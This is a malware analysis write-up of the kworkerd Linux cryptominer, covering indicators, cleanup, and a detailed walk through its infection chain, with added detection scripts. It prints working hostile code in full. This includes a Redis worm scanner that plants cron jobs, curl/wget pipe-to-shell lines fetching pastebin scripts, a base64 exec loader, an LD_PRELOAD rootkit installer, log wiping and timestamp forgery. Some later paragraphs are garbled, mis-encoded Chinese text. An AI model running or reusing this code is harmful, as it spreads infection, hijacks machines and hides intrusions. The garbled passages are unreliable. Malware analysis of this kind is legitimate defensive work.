
Kworkerd Malicious Mining Analysis

0x01 Quick indicator triage

top shows high CPU usage, but no process with high CPU usage is listed [screenshot]

A TCP connection has been established to port 13531 on an unknown server [screenshot]

The file /etc/ld.so.preload points to /usr/local/lib/libntp.so [screenshot]

A suspicious python process is executing base64-encoded code [screenshot]
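As an added example (not part of the original write-up), the four indicators above expressed as a small Python triage script. It runs over constructed sample snippets of ld.so.preload, netstat -anp and ps aux output modelled on the screenshots; on a suspect host the same functions can be fed the real command output.

```python
import re

# Constructed sample outputs modelled on the screenshots (not captured from a host)
SAMPLE_PRELOAD = "/usr/local/lib/libntp.so\n"
SAMPLE_NETSTAT = """\
tcp        0      0 10.0.0.5:52316      203.0.113.9:13531     ESTABLISHED 4242/kworkerds
tcp        0      0 127.0.0.1:22         127.0.0.1:40000       ESTABLISHED 900/sshd
"""
SAMPLE_PS = """\
root      4242  0.0  0.1  10000  2000 ?  S  15:50  0:00 python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTg...'))
root       900  0.0  0.2  20000  4000 ?  Ss 09:00  0:00 /usr/sbin/sshd
"""

def cpu_unaccounted(ps_output, total_cpu_pct):
    """Indicator 1: total CPU (top's summary line or /proc/stat) far above the
    sum of per-process %CPU means the consumer is hidden from ps/top."""
    rows = [l for l in ps_output.splitlines() if l.strip() and not l.startswith("USER")]
    accounted = sum(float(l.split()[2]) for l in rows)
    return total_cpu_pct - accounted

def mining_pool_peers(netstat_output, port=13531):
    """Indicator 2: remote addresses with an ESTABLISHED connection to the pool port."""
    pattern = re.compile(r"\s(\S+):%d\s+ESTABLISHED" % port)
    return [m.group(1) for m in map(pattern.search, netstat_output.splitlines()) if m]

def preload_entries(content):
    """Indicator 3: ld.so.preload is normally absent or empty; any entry needs review."""
    return [l.strip() for l in content.splitlines() if l.strip() and not l.startswith("#")]

def b64_python_pids(ps_output):
    """Indicator 4: PIDs of python interpreters that exec() base64-decoded code."""
    return [l.split()[1] for l in ps_output.splitlines()
            if re.search(r"python.*base64\.b64decode", l)]

def triage(preload=SAMPLE_PRELOAD, netstat=SAMPLE_NETSTAT, ps=SAMPLE_PS, total_cpu=100.0):
    """Collect every indicator in one dict; empty lists and a small CPU gap mean clean."""
    return {
        "cpu_unaccounted_pct": cpu_unaccounted(ps, total_cpu),
        "pool_peers": mining_pool_peers(netstat),
        "preload": preload_entries(preload),
        "b64_python_pids": b64_python_pids(ps),
    }

if __name__ == "__main__":
    for name, value in triage().items():
        print(name, "->", value)
```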

0x02 Quick cleanup

#!/bin/bash
# Kill the python loader (identified by the start of its base64-encoded payload)
ps aux|grep "I2NvZGluZzogdXRmLTg"|grep -v grep|awk '{print $2}'|xargs kill -9

# Empty every cron location the malware writes its download-and-execute task into
echo "" > /etc/cron.d/root
echo "" > /etc/cron.d/system
echo "" > /var/spool/cron/root
echo "" > /var/spool/cron/crontabs/root
rm -rf /etc/cron.hourly/oanacron
rm -rf /etc/cron.daily/oanacron
rm -rf /etc/cron.monthly/oanacron

# Remove the httpdns script and the last line that the system function appended to /etc/crontab
rm -rf /bin/httpdns
sed -i '$d' /etc/crontab

# Remove the preload rootkit entry and the library it points to
sed -i '$d' /etc/ld.so.preload
rm -rf /usr/local/lib/libntp.so

# Kill the miner and remove every copy of it, its marker file and its init script
ps aux|grep kworkerds|grep -v color|awk '{print $2}'|xargs kill -9
rm -rf /tmp/.tmph
rm -rf /bin/kworkerds
rm -rf /tmp/kworkerds
rm -rf /usr/sbin/kworkerds
rm -rf /etc/init.d/kworker
chkconfig --del kworker

0x03 Detailed behaviour analysis

A web search for the problem shows that quite a few people have run into it, for example: [screenshot]

First, CPU usage sits at 100%, but the top command shows no process with high usage, so a rootkit is suspected.
Looking at the crontab, a scheduled task has been written in that downloads and runs a script from pastebin roughly every half hour (pastebin is a platform where anyone can upload and share content, which the attacker uses to stay anonymous)
https://pastebin.com/raw/xbY7p5Tb
The content of the xbY7p5Tb script is as follows: [screenshot]

(curl -fsSL https://pastebin.com/raw/Gw7mywhC || wget -q -O- https://pastebin.com/raw/Gw7mywhC)|base64 -d |/bin/bash

This script downloads yet another script, base64-decodes its content and executes it: [screenshot]

The main logic of that script is extracted below (the many helper functions it calls are omitted):

update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM )
if [ ${update}x = "update"x ];then
    echocron
else
    if [ ! -f "/tmp/.tmph" ]; then
        rm -rf /tmp/.tmpg
        python
    fi
    kills
    downloadrun
    echocron
    system
    top
    sleep 10
    port=$(netstat -anp | grep :13531 | wc -l)
    if [ ${port} -eq 0 ];then
        downloadrunxm
    fi
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cron
fi

The malicious script first checks for updates; if there is an update, it runs echocron to perform the update
https://pastebin.com/raw/TzBeq3AM

[screenshot]

Next it checks for the marker file /tmp/.tmph; when the marker is absent, it removes /tmp/.tmpg and calls the python function.
The function named python in the script is:

function python() {
    # Launch a detached interpreter that decodes and exec()s the embedded loader,
    # then drop the marker file so this runs only once per host
    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
    touch /tmp/.tmph
}

The python code it executes is base64-encoded; decoded, it reads:

#coding: utf-8
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
    exec(page)
except:
    pass

This python code in turn reads content from https://pastebin.com/raw/nYBpuAxT and executes it: [screenshot]

After one more round of base64 decoding, the final code is shown below: a scanning attack script aimed at redis, used to spread the infection:

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 20
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            s.connect((self.host, 6379))
            # Redis inline commands are terminated by \r\n (the backslashes were lost in extraction)
            s.send('set backup1 "\n\n\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"\r\n')
            s.send('set backup2 "\n\n\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"\r\n')
            s.send('config set dir /var/spool/cron\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception as e:
            pass
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()

    newthread = staticmethod(newthread)

def get_ip_list():
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        # prefix of the host's own public address (fetched from ident.me); nearby ranges are scanned
        ips2 = findall(r'\d+\.\d+\.', ip2)[0][:-2]
        for u in range(0, 10):
            ip_list1 = (ips2 + (str(u)) +'.')
            for i in range(0, 256):
                ip_list2 = (ip_list1 + (str(i)))
                for g in range(0, 256):
                    IP_LIST.append(ip_list2 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
        scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

if __name__ == "__main__":
    runPortscan()

The key code of the attack script is the following: it scans port 6379 of redis and, where no access authentication is configured, performs remote command execution directly to infect the host.

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((self.host, 6379))
s.send('set backup1 "\n\n\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"\r\n')
s.send('set backup2 "\n\n\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\n\n\n"\r\n')
s.send('config set dir /var/spool/cron\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
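From the defender's side, the scan above only succeeds against a Redis that is reachable from the network, has no password and still exposes CONFIG. As an added example (not part of the original write-up), a small audit of redis.conf that flags exactly those conditions, run over two constructed config fragments, one permissive and one hardened; the requirepass value is a placeholder.

```python
# Constructed redis.conf fragments (not from the page or from any real host)
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
dir /var/lib/redis
"""

def parse_conf(text):
    """Map directive -> list of argument strings (rename-command may repeat)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, rest = line.partition(" ")
        conf.setdefault(key.lower(), []).append(rest.strip())
    return conf

def audit(text):
    """Return the findings that matter for the cron-write technique shown above."""
    conf = parse_conf(text)
    findings = []
    binds = set(" ".join(conf.get("bind", ["0.0.0.0"])).split())  # no bind = all interfaces
    if binds & {"0.0.0.0", "::"}:
        findings.append("bind: listens on all interfaces")
    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":  # 'yes' is the 3.2+ default
        findings.append("protected-mode off: unauthenticated remote clients accepted")
    if not conf.get("requirepass") or conf["requirepass"][0] in ("", '""'):
        findings.append("no requirepass: any client may run SET, CONFIG SET and SAVE")
    if not any(v.lower().startswith("config ") for v in conf.get("rename-command", [])):
        findings.append("CONFIG not renamed/disabled: 'config set dir/dbfilename' picks where SAVE writes")
    return findings

if __name__ == "__main__":
    print("weak:", audit(WEAK_CONF))
    print("hardened:", audit(HARDENED_CONF))
```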

Once the python function has run, the main logic continues with the following code:

if [ ! -f "/tmp/.tmph" ]; then
    rm -rf /tmp/.tmpg
    python
fi
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep :13531 | wc -l)
if [ ${port} -eq 0 ];then
    downloadrunxm
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron

The kills function mainly checks whether other mining programs are running and simply kills them; its code is not shown here.

The downloadrun function is shown below: it downloads a file disguised as a jpg from thyrsi.com, saves it as kworkerds under /tmp and runs it:

function downloadrun() {
    ps=$(netstat -anp | grep :13531 | wc -l)
    if [ ${ps} -eq 0 ];then
        if [ ! -f "/tmp/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod 777 /tmp/kworkerds
            if [ ! -f "/tmp/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod 777 /tmp/kworkerds
            fi
                nohup /tmp/kworkerds >/dev/null 2>&1 &
        else
            nohup /tmp/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

The kworkerds file is the miner itself; submitting it to virustotal gives: [screenshot]

[screenshot]

Next the echocron function runs. It writes a task that downloads and executes the malicious script into each of the cron locations, and it clears the related logs, which makes cleanup harder: [screenshot]

    echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/root
    echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/system
    echo -e "*/23 * * * *    (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo -e "*/31 * * * *    (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /var/spool/cron/crontabs/root
    mkdir -p /etc/cron.hourly
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    if [ ! -f "/etc/cron.hourly/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron
    fi
    mkdir -p /etc/cron.daily
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    if [ ! -f "/etc/cron.daily/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron
    fi
    mkdir -p /etc/cron.monthly
    curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    if [ ! -f "/etc/cron.monthly/oanacron" ]; then
        wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron
    fi
    touch -acmr /bin/sh /var/spool/cron/root
    touch -acmr /bin/sh /var/spool/cron/crontabs/root
    touch -acmr /bin/sh /etc/cron.d/system
    touch -acmr /bin/sh /etc/cron.d/root
    touch -acmr /bin/sh /etc/cron.hourly/oanacron
    touch -acmr /bin/sh /etc/cron.daily/oanacron
    touch -acmr /bin/sh /etc/cron.monthly/oanacron
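Two detection angles for what echocron does, as an added example that is not part of the original write-up: every cron entry it writes fetches a script from pastebin and pipes it to sh, and the trailing touch -acmr copies /bin/sh's atime and mtime onto the new files but cannot set ctime, which the kernel stamps itself on each utime() call. The script uses constructed cron lines and a temporary directory rather than real system files; the same ctime check applies to the ld.so.preload and libntp.so files that the top function timestamps the same way.

```python
import os
import re
import tempfile
import time

# Constructed cron file content mirroring what echocron writes (not taken from a host)
SAMPLE_CRON = """\
*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
##
0 5 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""
# a remote fetch piped into a shell, or the paste host this campaign stages its scripts on
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\bpastebin\.com/raw/", re.I)

def suspicious_cron_lines(text):
    """Return cron entries that fetch a remote script and pipe it to a shell."""
    return [l for l in text.splitlines()
            if l.strip() and not l.startswith("#") and DOWNLOAD_EXEC.search(l)]

def backdated(path, slack=3600):
    """touch -acmr copies atime/mtime from a reference file but cannot set ctime:
    every utime() call makes the kernel stamp ctime with the current time, so a
    file whose mtime is much older than its ctime had its times rewritten."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack

def demo():
    """Replay the forgery in a temp dir; returns (forged file flagged, untouched file flagged)."""
    with tempfile.TemporaryDirectory() as d:
        ref, target, fresh = (os.path.join(d, n) for n in ("sh", "root", "fresh"))
        for p in (ref, target, fresh):
            open(p, "w").close()
        old = time.time() - 10 * 86400
        os.utime(ref, (old, old))                     # stand-in for a long-installed /bin/sh
        st = os.stat(ref)
        os.utime(target, (st.st_atime, st.st_mtime))  # same effect as: touch -acmr sh root
        return backdated(target), backdated(fresh)

if __name__ == "__main__":
    print(suspicious_cron_lines(SAMPLE_CRON))
    print(demo())  # (True, False)
```

A package upgrade or cp -p also leaves mtime older than ctime, so treat the timestamp check as a prompt to inspect the file content, not as proof on its own.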

之后執(zhí)行system和top函數(shù),system函數(shù)中下載了一個(gè)惡意的腳本文件放置在/bin目錄下,并且寫入定時(shí)任務(wù)。

function system() {
    if [ ! -f "/bin/httpdns" ]; then
        curl -fsSL https://pastebin.com/raw/Fj2YdETv -o /bin/httpdns && chmod 755 /bin/httpdns
        if [ ! -f "/bin/httpdns" ]; then
            wget  https://pastebin.com/raw/Fj2YdETv -O /bin/httpdns && chmod 755 /bin/httpdns
        fi
        if [ ! -f "/etc/crontab" ]; then
            echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
        else
            sed -i '$d' /etc/crontab && echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab
        fi
    fi
}

The content of httpdns is: [screenshot]

This script downloads yet another script and executes it; its content is similar to the main script above (the kills, system and top functions are removed, and an init function is added that downloads and runs the miner): [screenshot]

The top function carries out the rootkit behaviour.
It downloads a malicious shared library disguised as a jpg, places it under /usr/local/lib, then replaces the /etc/ld.so.preload file so that the library is preloaded and hijacks Linux system functions; as a result commands such as top and ps cannot find the mining process. [screenshot]

關(guān)于preload預(yù)加載惡意動(dòng)態(tài)鏈接相關(guān),可以閱讀此文參考:

https://blog.csdn.net/aganlengzi/article/details/21824553

最后通過touch–acmr命令,掩蓋剛剛執(zhí)行的操作(使得文件存取時(shí)間和變動(dòng)時(shí)間與/bin/sh的日期一致,避免被懷疑)

function top() {
    mkdir -p /usr/local/lib/
    if [ ! -f "/usr/local/lib/libntp.so" ]; then
        curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        if [ ! -f "/usr/local/lib/libntp.so" ]; then
            wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
        fi
    fi
    if [ ! -f "/etc/ld.so.preload" ]; then
        echo /usr/local/lib/libntp.so > /etc/ld.so.preload
    else
        sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
    fi
    touch -acmr /bin/sh /etc/ld.so.preload
    touch -acmr /bin/sh /usr/local/lib/libntp.so
}

After the functions above have run, the main script sleeps for 10 seconds and checks whether a connection to port 13531 has been established; if not, it runs the downloadrunxm function (as shown later, 13531 is the port of the mining pool it connects to).
The downloadrunxm function likewise downloads a disguised jpg file, saves it as /bin/config.json, then downloads kworkerds once more and runs it:

function downloadrunxm() {
    pm=$(netstat -anp | grep :13531 | wc -l)
    if [ ${pm} -eq 0 ];then
        if [ ! -f "/bin/config.json" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod 777 /bin/config.json
            if [ ! -f "/bin/config.json" ]; then
                wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod 777 /bin/config.json
            fi
        fi
        if [ ! -f "/bin/kworkerds" ]; then
            curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod 777 /bin/kworkerds
            if [ ! -f "/bin/kworkerds" ]; then
                wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod 777 /bin/kworkerds
            fi
                nohup /bin/kworkerds >/dev/null 2>&1 &
        else
            nohup /bin/kworkerds >/dev/null 2>&1 &
        fi
    fi
}

The content of the config.json obtained is as follows:

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 0,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "stratum+tcp://xmr.f2pool.com:13531",
            "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}

The mining pool it connects to is the Chinese pool f2pool.com (魚池): [screenshot]

0x04 Sample collection and sharing

Repository of the malicious mining samples collected: https://github.com/MRdoulestar/whatMiner

Original article: https://www.anquanke.com/post/id/159497
